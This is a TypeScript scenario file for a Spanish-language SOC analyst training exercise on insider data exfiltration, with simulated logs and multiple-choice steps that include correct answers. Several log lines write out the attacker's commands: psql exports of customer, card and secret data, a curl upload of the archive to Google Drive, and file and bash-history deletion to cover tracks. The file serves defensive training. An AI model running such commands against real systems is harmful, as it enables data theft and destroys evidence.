import type { Scenario } from "./types";

const scenario: Scenario = {
  id: "insider-threat",
  title: "Amenaza interna — exfiltración de datos",
  severity: "high",
  description: "DLP detectó subida de archivos sensibles a un servicio cloud personal. Zeek HTTP y auditoría de base de datos confirman que Lucía Fernández (Desarrolladora Backend) está extrayendo datos de clientes de la base de datos y subiéndolos a su cuenta personal de Google Drive.",
  alertSource: "DLP + Zeek HTTP + DB Audit",
  alertTime: "2026-08-24 18:45:00 UTC",
  logs: [
    { line: 1, timestamp: "Aug 24 17:00:05", source: "srv-web-01 nginx.access", message: "GET /api/health 200 — 10.10.2.44 — Lucía Fernández Dev", severity: "info", flagged: false },
    { line: 2, timestamp: "Aug 24 17:01:10", source: "srv-db-01 sshd[1801]", message: "Accepted publickey for lucia from 10.10.2.44 port 50601 ssh2", severity: "info", flagged: false },
    { line: 3, timestamp: "Aug 24 17:02:00", source: "srv-db-01 audit.log", message: "EXECVE: uid=1002(lucia) cmd=/usr/bin/psql -U app_user production_db", severity: "info", flagged: false },
    { line: 4, timestamp: "Aug 24 17:03:15", source: "srv-monitor cron", message: "Health check: srv-db-01 — CPU 12% — RAM 45% — Disk 65%", severity: "info", flagged: false },
    { line: 5, timestamp: "Aug 24 17:04:00", source: "srv-web-01 node.app", message: "Queue processor: 167 jobs completed, 23 pending", severity: "info", flagged: false },
    { line: 6, timestamp: "Aug 24 17:05:30", source: "srv-web-01 nginx.access", message: "POST /api/payments/process 201 — 10.10.3.10 — Sofía Ramírez Ops", severity: "info", flagged: false },
    { line: 7, timestamp: "Aug 24 17:06:00", source: "srv-monitor cron", message: "Metric aggregation: 8,934 events — avg latency 13ms", severity: "info", flagged: false },
    { line: 8, timestamp: "Aug 24 17:07:15", source: "srv-db-01 audit.log", message: "EXECVE: uid=1002(lucia) cmd=/usr/bin/psql -U app_user production_db -c 'SELECT * FROM customers LIMIT 1000'", severity: "info", flagged: false },
    { line: 9, timestamp: "Aug 24 17:08:00", source: "srv-web-01 sshd[22801]", message: "Accepted publickey for martin from 10.10.1.15 port 50701 ssh2", severity: "info", flagged: false },
    { line: 10, timestamp: "Aug 24 17:09:30", source: "srv-web-01 nginx.access", message: "GET /api/orders/history 200 — 10.10.3.22 — Carlos Ruiz Corp", severity: "info", flagged: false },
    { line: 11, timestamp: "Aug 24 17:10:00", source: "srv-monitor cron", message: "Health check: srv-web-01 — CPU 20% — RAM 48% — Disk 61%", severity: "info", flagged: false },
    { line: 12, timestamp: "Aug 24 17:11:15", source: "srv-db-01 audit.log", message: "EXECVE: uid=1002(lucia) cmd=/usr/bin/psql -U app_user production_db -c 'COPY (SELECT customer_id, name, email, phone, credit_card_last4, address FROM customers) TO '/tmp/customer_export.csv' WITH CSV HEADER'", severity: "warning", flagged: true },
    { line: 13, timestamp: "Aug 24 17:12:00", source: "srv-web-01 node.app", message: "SSL certificate renewal check — expires in 18 days", severity: "info", flagged: false },
    { line: 14, timestamp: "Aug 24 17:13:30", source: "srv-web-01 nginx.access", message: "GET /dashboard 200 — 10.10.1.20 — Diego López SOC", severity: "info", flagged: false },
    { line: 15, timestamp: "Aug 24 17:14:00", source: "srv-db-01 audit.log", message: "EXECVE: uid=1002(lucia) cmd=/usr/bin/psql -U app_user production_db -c 'SELECT order_id, customer_id, amount, payment_method, card_number FROM orders WHERE year=2026'", severity: "warning", flagged: true },
    { line: 16, timestamp: "Aug 24 17:15:10", source: "srv-web-01 kernel", message: "[UFW BLOCK] IN=eth0 SRC=203.0.113.77 DST=10.10.1.10 PROTO=TCP SPT=4444 DPT=22", severity: "info", flagged: false },
    { line: 17, timestamp: "Aug 24 17:16:00", source: "srv-db-01 audit.log", message: "EXECVE: uid=1002(lucia) cmd=/usr/bin/psql -U app_user production_db -c 'COPY (SELECT o.order_id, o.customer_id, c.name, c.email, c.credit_card_last4, o.amount FROM orders o JOIN customers c ON o.customer_id=c.customer_id WHERE o.year=2026) TO '/tmp/orders_export.csv' WITH CSV HEADER'", severity: "critical", flagged: true },
    { line: 18, timestamp: "Aug 24 17:17:30", source: "srv-web-01 nginx.access", message: "POST /api/auth/login 200 — 10.10.2.44 — Lucía Fernández", severity: "info", flagged: false },
    { line: 19, timestamp: "Aug 24 17:18:00", source: "srv-monitor cron", message: "Health check: srv-db-01 — CPU 28% — RAM 52% — Disk 66%", severity: "info", flagged: false },
    { line: 20, timestamp: "Aug 24 17:19:15", source: "srv-db-01 audit.log", message: "EXECVE: uid=1002(lucia) cmd=/bin/bash -c 'ls -la /tmp/*.csv'", severity: "info", flagged: false },
    { line: 21, timestamp: "Aug 24 17:20:00", source: "srv-web-01 node.app", message: "Queue processor: 154 jobs completed, 18 pending", severity: "info", flagged: false },
    { line: 22, timestamp: "Aug 24 17:21:30", source: "srv-db-01 audit.log", message: "EXECVE: uid=1002(lucia) cmd=/bin/bash -c 'tar czf /tmp/customer_data_2026.tar.gz /tmp/customer_export.csv /tmp/orders_export.csv'", severity: "critical", flagged: true },
    { line: 23, timestamp: "Aug 24 17:22:00", source: "srv-web-01 sshd[22810]", message: "Accepted publickey for diego from 10.10.1.20 port 50801 ssh2", severity: "info", flagged: false },
    { line: 24, timestamp: "Aug 24 17:23:15", source: "srv-db-01 audit.log", message: "EXECVE: uid=1002(lucia) cmd=/bin/bash -c 'curl -s -F file=@/tmp/customer_data_2026.tar.gz https://drive.google.com/upload —oauth2-access-token ya29.a0AfH6SMB...'", severity: "critical", flagged: true },
    { line: 25, timestamp: "Aug 24 17:24:00", source: "srv-db-01 zeek.http", message: "POST https://drive.google.com/upload — 10.10.2.44 — 2.4MB upload — Content-Type: multipart/form-data", severity: "critical", flagged: true },
    { line: 26, timestamp: "Aug 24 17:25:10", source: "srv-web-01 nginx.access", message: "GET /api/products?page=1 200 — 10.10.3.10 — Sofía Ramírez Ops", severity: "info", flagged: false },
    { line: 27, timestamp: "Aug 24 17:26:00", source: "srv-monitor cron", message: "Metric aggregation: 9,201 events — avg latency 12ms", severity: "info", flagged: false },
    { line: 28, timestamp: "Aug 24 17:27:30", source: "srv-db-01 audit.log", message: "EXECVE: uid=1002(lucia) cmd=/bin/bash -c 'rm /tmp/customer_export.csv /tmp/orders_export.csv /tmp/customer_data_2026.tar.gz'", severity: "critical", flagged: true },
    { line: 29, timestamp: "Aug 24 17:28:00", source: "srv-db-01 audit.log", message: "EXECVE: uid=1002(lucia) cmd=/usr/bin/psql -U app_user production_db -c 'SELECT * FROM payment_tokens WHERE active=true LIMIT 500'", severity: "critical", flagged: true },
    { line: 30, timestamp: "Aug 24 17:29:15", source: "srv-web-01 nginx.access", message: "POST /api/reports/generate 202 — 10.10.1.15 — Martin Gonzalez Admin", severity: "info", flagged: false },
    { line: 31, timestamp: "Aug 24 17:30:00", source: "srv-db-01 audit.log", message: "EXECVE: uid=1002(lucia) cmd=/usr/bin/psql -U app_user production_db -c 'COPY (SELECT token_id, customer_id, card_number, expiry_date, cvv FROM payment_tokens WHERE active=true) TO '/tmp/tokens_export.csv' WITH CSV HEADER'", severity: "critical", flagged: true },
    { line: 32, timestamp: "Aug 24 17:31:00", source: "srv-web-01 node.app", message: "Cache hit ratio: 92.1% — Redis memory: 301MB/512MB", severity: "info", flagged: false },
    { line: 33, timestamp: "Aug 24 17:32:30", source: "srv-db-01 audit.log", message: "EXECVE: uid=1002(lucia) cmd=/bin/bash -c 'tar czf /tmp/payment_tokens_2026.tar.gz /tmp/tokens_export.csv'", severity: "critical", flagged: true },
    { line: 34, timestamp: "Aug 24 17:33:00", source: "srv-monitor cron", message: "Health check: srv-app-01 — CPU 38% — RAM 56% — Disk 70%", severity: "info", flagged: false },
    { line: 35, timestamp: "Aug 24 17:34:15", source: "srv-db-01 zeek.http", message: "POST https://drive.google.com/upload — 10.10.2.44 — 1.8MB upload — Content-Type: multipart/form-data", severity: "critical", flagged: true },
    { line: 36, timestamp: "Aug 24 17:35:00", source: "srv-web-01 sshd[22820]", message: "Accepted publickey for sofia from 10.10.3.10 port 50901 ssh2", severity: "info", flagged: false },
    { line: 37, timestamp: "Aug 24 17:36:30", source: "srv-db-01 audit.log", message: "EXECVE: uid=1002(lucia) cmd=/bin/bash -c 'rm /tmp/tokens_export.csv /tmp/payment_tokens_2026.tar.gz'", severity: "critical", flagged: true },
    { line: 38, timestamp: "Aug 24 17:37:00", source: "srv-web-01 nginx.access", message: "GET /api/health 200 — 10.10.1.20 — Diego López SOC", severity: "info", flagged: false },
    { line: 39, timestamp: "Aug 24 17:38:15", source: "srv-db-01 audit.log", message: "EXECVE: uid=1002(lucia) cmd=/usr/bin/psql -U app_user production_db -c 'SELECT setting_value FROM system_config WHERE setting_name IN ('api_key_stripe','api_key_sendgrid','smtp_password')'", severity: "critical", flagged: true },
    { line: 40, timestamp: "Aug 24 17:39:00", source: "srv-monitor cron", message: "Health check: srv-db-01 — CPU 18% — RAM 48% — Disk 65%", severity: "info", flagged: false },
    { line: 41, timestamp: "Aug 24 17:40:30", source: "srv-db-01 audit.log", message: "EXECVE: uid=1002(lucia) cmd=/usr/bin/psql -U app_user production_db -c 'COPY (SELECT * FROM system_config WHERE setting_name IN ('api_key_stripe','api_key_sendgrid','smtp_password')) TO '/tmp/secrets_export.csv' WITH CSV HEADER'", severity: "critical", flagged: true },
    { line: 42, timestamp: "Aug 24 17:41:00", source: "srv-web-01 nginx.access", message: "POST /api/payments/process 200 — 10.10.3.22 — Carlos Ruiz Corp", severity: "info", flagged: false },
    { line: 43, timestamp: "Aug 24 17:42:15", source: "srv-db-01 audit.log", message: "EXECVE: uid=1002(lucia) cmd=/bin/bash -c 'tar czf /tmp/secrets_2026.tar.gz /tmp/secrets_export.csv'", severity: "critical", flagged: true },
    { line: 44, timestamp: "Aug 24 17:43:00", source: "srv-db-01 zeek.http", message: "POST https://drive.google.com/upload — 10.10.2.44 — 0.3MB upload — Content-Type: multipart/form-data", severity: "critical", flagged: true },
    { line: 45, timestamp: "Aug 24 17:44:30", source: "srv-db-01 audit.log", message: "EXECVE: uid=1002(lucia) cmd=/bin/bash -c 'rm /tmp/secrets_export.csv /tmp/secrets_2026.tar.gz'", severity: "critical", flagged: true },
    { line: 46, timestamp: "Aug 24 17:45:00", source: "srv-web-01 node.app", message: "Queue processor: 178 jobs completed, 25 pending", severity: "info", flagged: false },
    { line: 47, timestamp: "Aug 24 17:46:15", source: "srv-db-01 audit.log", message: "EXECVE: uid=1002(lucia) cmd=/bin/bash -c 'history -c && rm /root/.bash_history'", severity: "critical", flagged: true },
    { line: 48, timestamp: "Aug 24 17:47:00", source: "srv-web-01 kernel", message: "[UFW BLOCK] IN=eth0 SRC=192.0.2.55 DST=10.10.1.10 PROTO=TCP SPT=3389 DPT=3389", severity: "info", flagged: false },
    { line: 49, timestamp: "Aug 24 17:48:30", source: "srv-db-01 audit.log", message: "EXECVE: uid=1002(lucia) cmd=/usr/bin/psql -U app_user production_db -c 'SELECT count(*) FROM customers'", severity: "info", flagged: false },
    { line: 50, timestamp: "Aug 24 17:49:00", source: "srv-web-01 sshd[22830]", message: "Accepted publickey for carlos from 10.10.3.22 port 51001 ssh2", severity: "info", flagged: false },
    { line: 51, timestamp: "Aug 24 17:50:15", source: "srv-monitor cron", message: "DLP alert: 3 files uploaded to personal cloud storage from srv-db-01 — total 4.5MB — user: lucia", severity: "critical", flagged: true },
    { line: 52, timestamp: "Aug 24 17:51:00", source: "srv-db-01 zeek.http", message: "GET https://drive.google.com/drive/my-drive — 10.10.2.44 — 200 OK", severity: "warning", flagged: true },
    { line: 53, timestamp: "Aug 24 17:52:30", source: "srv-db-01 audit.log", message: "EXECVE: uid=1002(lucia) cmd=/usr/bin/psql -U app_user production_db -c 'DROP TABLE temp_export'", severity: "info", flagged: false },
    { line: 54, timestamp: "Aug 24 18:45:00", source: "srv-monitor alert", message: "DLP violation confirmed: Lucía Fernández uploaded customer PII + payment tokens + API secrets to personal Google Drive (3 uploads totaling 4.5MB)", severity: "critical", flagged: true },
    { line: 55, timestamp: "Aug 24 18:45:30", source: "srv-db-01 audit.log", message: "EXECVE: uid=1002(lucia) cmd=exit", severity: "info", flagged: false },
  ],
  playbook: [],
  steps: [
    {
      id: "identify",
      title: "Paso 1 — Identificar los logs relevantes",
      description: "Revisá el log completo. ¿Qué líneas son parte de la amenaza interna?",
      hint: "Mirá las queries SQL, las subidas a Google Drive, y la eliminación de evidencia.",
      options: [
        {
          id: "a",
          label: "Solo las líneas 24, 35, 44 (las subidas a Google Drive)",
          correct: false,
          explanation: "Las subidas son solo la exfiltración final. Necesitás ver las queries SQL que extrajeron los datos, las compresiones, y la eliminación de evidencia para entender el alcance completo.",
          consequence: "En un SOC real, reportar solo las subidas sin ver qué datos específicos se robaron hace que el equipo no dimensione la gravedad: no sabrán si se robaron 100 o 100,000 registros de clientes.",
        },
        {
          id: "b",
          label: "Líneas 12-13, 15, 17, 22, 24-25, 28-31, 33, 35, 37, 39, 41, 43-45, 47, 51-54 (cadena completa)",
          correct: true,
          explanation: "Correcto. La secuencia es: queries SQL de extracción (SELECT de customers, orders, payment_tokens, secrets) -> export a CSV -> compresión -> subida a Google Drive -> eliminación de archivos -> limpieza de historial. Todo es parte del mismo incidente.",
        },
        {
          id: "c",
          label: "Todas las líneas del log (1-55)",
          correct: false,
          explanation: "Las líneas normales incluyen health checks, activity de otros usuarios, y tráfico legítimo. No son parte de la amenaza interna. Incluir todo dificulta el análisis forense.",
          consequence: "En un SOC real, entregar 55 líneas de 'evidencia' donde 30 son tráfico legítimo hace que el equipo de contención pierda horas investigando usuarios inocentes mientras la exfiltración sigue activa.",
        },
        {
          id: "d",
          label: "Solo la línea 54 (la alerta DLP final)",
          correct: false,
          explanation: "La alerta DLP es el resultado final, pero necesitás ver todo el proceso: qué queries se ejecutaron, qué datos se extrajeron, cómo se subieron, y qué evidencia se eliminó.",
          consequence: "En un SOC real, reportar solo la alerta DLP sin la evidencia de las queries SQL hace que el equipo no pueda determinar qué datos específicos fueron comprometidos, lo cual es crítico para la notificación regulatoria.",
        },
      ],
    },
    {
      id: "assign",
      title: "Paso 2 — Asignar el incidente",
      description: "¿Quién debería tomar este caso? Una empleada está exfiltrando datos de clientes.",
      hint: "Considerá que esto es amenaza interna con exfiltración de datos regulatorios.",
      options: [
        {
          id: "a",
          label: "Lucía Fernández — que ella misma investigue su activity",
          correct: false,
          explanation: "Lucía es la sospechosa. Darle acceso a la investigación es como darle al ladrón las cámaras de seguridad. Ella podría borrar más evidencia o alertar a cómplices.",
          consequence: "En un SOC real, involucrar a la persona sospechosa en la investigación permite que destruya evidencia, alerte a otros involucrados, o altere registros para cubrir sus huellas.",
        },
        {
          id: "b",
          label: "Diego López (SOC L2) + Ana Martínez (DevOps) + escalamiento a CISO y Legal por amenaza interna",
          correct: true,
          explanation: "Correcto. Amenaza interna con exfiltración de datos de clientes requiere: investigación (Diego), contención técnica (Ana — desactivar cuenta, revocar access), y escalamiento inmediato a CISO y Legal por implicaciones regulatorias.",
        },
        {
          id: "c",
          label: "Martín González (SysAdmin) — que revise los permisos de Lucía en la DB",
          correct: false,
          explanation: "Revisar permisos es importante, pero es una acción de remediación, no de contención inmediata. La cuenta de Lucía sigue activa y podría seguir exfiltrando datos mientras se revisan los permisos.",
          consequence: "En un SOC real, revisar permisos mientras la exfiltración sigue activa es como cerrar la puerta del establo después de que se escaparon los caballos.",
        },
        {
          id: "d",
          label: "Sofía Ramírez (Gerente de Operaciones) — que decida si Lucía debe ser despedida",
          correct: false,
          explanation: "La decisión de despido es una acción de RRHH, no de contención de seguridad. Primero se contiene el incidente, se preserva la evidencia, y luego RRHH toma decisiones administrativas.",
          consequence: "En un SOC real, priorizar decisiones de RRHH sobre la contención de seguridad permite que la exfiltración continúe mientras se debate el futuro laboral del sospechoso.",
        },
      ],
    },
    {
      id: "playbook",
      title: "Paso 3 — Consultar el playbook",
      description: "El playbook está vacío. ¿Cuál es la PRIMERA acción de contención para una amenaza interna con exfiltración activa?",
      hint: "Pensá en cortar el acceso de la persona mientras preservas la evidencia.",
      options: [
        {
          id: "a",
          label: "Hablar con Lucía para entender por qué está subiendo archivos",
          correct: false,
          explanation: "Confrontar al sospechoso sin contención previa permite que destruya evidencia, alerte a cómplices, o continúe la exfiltración mientras 'explica' su situación.",
          consequence: "En un SOC real, confrontar a un insider sin contención previa es el error más común. El sospechoso puede borrar logs, destruir evidencia, o subir más datos mientras 'conversás'.",
        },
        {
          id: "b",
          label: "Desactivar la cuenta de Lucía, revocar acceso SSH a srv-db-01, bloquear subidas a Google Drive desde la red corporativa, y preservar evidencia forense",
          correct: true,
          explanation: "Correcto. La contención de amenaza interna requiere: 1) desactivar cuenta para cortar acceso, 2) revocar SSH, 3) bloquear exfiltración a cloud, 4) preservar logs como evidencia. En ese orden.",
        },
        {
          id: "c",
          label: "Apagar srv-db-01 para detener la exfiltración",
          correct: false,
          explanation: "Apagar la base de datos de producción causa downtime en todos los servicios que dependen de ella. La exfiltración se corta desactivando la cuenta de Lucía, no apagando el servidor.",
          consequence: "En un SOC real, apagar un servidor de base de datos en producción causa caídas en todos los servicios de la empresa. La contención debe ser quirúrgica, no drástica.",
        },
        {
          id: "d",
          label: "Borrar los archivos que Lucía subió a Google Drive",
          correct: false,
          explanation: "No puedes borrar archivos de Google Drive personal de Lucía sin acceso legal. Además, borrar evidencia puede interferir con la investigación legal. La prioridad es contener, no borrar.",
          consequence: "En un SOC real, intentar borrar datos de la nube personal del sospechoso sin autorización legal puede ser ilegal y destruir evidencia necesaria para un caso penal.",
        },
      ],
    },
    {
      id: "classify",
      title: "Paso 4 — Clasificar la alerta",
      description: "¿Cuál es la clasificación correcta de este incidente?",
      hint: "Considerá: extracción intencional de datos, subida a cloud personal, eliminación de evidencia.",
      options: [
        {
          id: "a",
          label: "Falso positivo — Lucía probablemente está haciendo una copia de seguridad legítima",
          correct: false,
          explanation: "Copias de seguridad legítimas se hacen a destinos corporativos autorizados, no a Google Drive personal. Además, Lucía extrajo datos de clientes y tokens de pago que no son parte de su trabajo de desarrollo.",
          consequence: "En un SOC real, clasificar exfiltración intencional a Google Drive personal como 'copia de seguridad' ignora que hay datos de clientes comprometidos que requieren notificación regulatoria.",
        },
        {
          id: "b",
          label: "Positivo verdadero — Amenaza interna con exfiltración intencional de datos de clientes",
          correct: true,
          explanation: "Correcto. La evidencia es clara: extracción selectiva de datos sensibles (customers, payment_tokens, API secrets) + subida a Google Drive personal + eliminación de archivos + limpieza de historial. Esto es exfiltración intencional.",
        },
        {
          id: "c",
          label: "Requiere investigación — puede ser un error de configuración",
          correct: false,
          explanation: "Un error de configuración no ejecuta queries SQL SELECT específicas, no comprime archivos, no los sube a Google Drive, y no elimina evidencia. Cada paso fue intencional y deliberado.",
          consequence: "En un SOC real, clasificar exfiltración intencional como \'error de configuración\' retrasa la notificación regulatoria y permite que el sospechoso siga operando libremente.",
        },
      ],
    },
    {
      id: "writeup",
      title: "Paso 5 — Redacción del reporte",
      description: "Escribí el reporte del incidente. Este es un caso de amenaza interna con implicaciones legales.",
      hint: "Incluí: quién, qué datos, cómo, cuánto, y acciones ejecutadas.",
      options: [
        {
          id: "a",
          label: "Una empleada subió archivos a su nube personal. Hay que revisar el policy.",
          correct: false,
          explanation: "Demasiado vago. No menciona qué datos específicos se robaron, cuántos registros, qué servidores, ni las acciones de contención ejecutadas.",
          consequence: "En un SOC real, un reporte así no permite a Legal determinar si hay obligación de notificación regulatoria. Sin saber qué datos se robaron, no puedes notificar a los clientes afectados.",
        },
        {
          id: "b",
          label: "Amenaza interna confirmada — Lucía Fernández (Desarrolladora Backend, 10.10.2.44) extrajo datos de clientes de production_db (srv-db-01) entre 17:00-17:50 UTC. Datos extraídos: customers (customer_id, name, email, phone, credit_card_last4, address), orders (order_id, amount, payment_method, card_number), payment_tokens (token_id, card_number, expiry_date, cvv), y system secrets (api_key_stripe, api_key_sendgrid). Total: ~4.5MB subidos a Google Drive personal en 3 uploads. Evidencia de eliminación de archivos y limpieza de historial. Cuenta desactivada, SSH revocado, DLP actualizado. Impacto: datos de clientes de pagos comprometidos — notificación regulatoria requerida.",
          correct: true,
          explanation: "Reporte completo de amenaza interna: QUIÉN (Lucía), QUÉ DATOS (customers, orders, payment_tokens, secrets), CÓMO (psql queries + curl a Google Drive), CUÁNDO (17:00-17:50), CUÁNTO (4.5MB), EVIDENCIA DE DESTRUCCIÓN (rm + history -c), CONTENCIÓN, e IMPACTO REGULATORIO. Formato profesional SOC.",
        },
        {
          id: "c",
          label: "Lucía robó datos. Hay que despedirla y cambiar todas las contraseñas.",
          correct: false,
          explanation: "Lenguaje informal sin datos técnicos. 'Cambiar todas las contraseñas' no es una acción de contención. No hay IP, timestamp, datos específicos, ni plan de notificación regulatoria.",
          consequence: "En un SOC real, un reporte sin datos específicos impide la notificación regulatoria a clientes cuyos datos de tarjetas de crédito fueron comprometidos.",
        },
      ],
    },
    {
      id: "return",
      title: "Paso 6 — Volver al panel",
      description: "Incidente documentado y escalado. ¿Qué sigue en tu flujo de trabajo?",
      hint: "Pensá en amenaza interna con implicaciones legales y regulatorias.",
      options: [
        {
          id: "a",
          label: "Cerrar el caso — ya está todo documentado",
          correct: false,
          explanation: "Un caso de amenaza interna con datos de clientes comprometidos no se cierra sin: verificación de que la cuenta fue desactivada, preservación de evidencia forense, notificación a Legal, y coordinación con DPO para notificación regulatoria.",
          consequence: "En un SOC real, cerrar un caso de amenaza interna sin verificar la preservación de evidencia puede arruinar un caso legal contra el empleado y exponer a la empresa a multas regulatorias.",
        },
        {
          id: "b",
          label: "Volver al panel de logs para monitorear si hay más activity sospechosa de otros empleados mientras Legal y DPO ejecutan sus protocolos",
          correct: true,
          explanation: "Correcto. Tu rol es vigilancia continua: ¿hay otros empleados exfiltrando datos? ¿el atacante tiene cómplices? ¿hay más exfiltración en curso? Mientras Legal ejecuta, vos monitoreás.",
        },
        {
          id: "c",
          label: "Ir a revisar la workstation de Lucía físicamente",
          correct: false,
          explanation: "Como SOC analyst, no deberías manipular evidencia físicamente. Eso es trabajo del equipo forense y Legal. Tu rol es análisis de logs, clasificación, y monitoreo continuo.",
          consequence: "En un SOC real, tocar la workstation sin protocolo forense y sin presencia de RRHH puede comprometer la cadena de custodia y hacer inadmisible la evidencia en un caso legal.",
        },
      ],
    },
  ],
  summary: "Amenaza interna confirmada — Lucía Fernández extrajo datos de clientes de production_db (customers, orders, payment_tokens, API secrets) y los subió a Google Drive personal. ~4.5MB de datos sensibles exfiltrados entre 17:00-17:50 UTC. Evidencia de eliminación de archivos y limpieza de historial. Clasificación: POSITIVO VERDADERO — Exfiltración intencional de datos con implicaciones regulatorias.",
};

export default scenario;
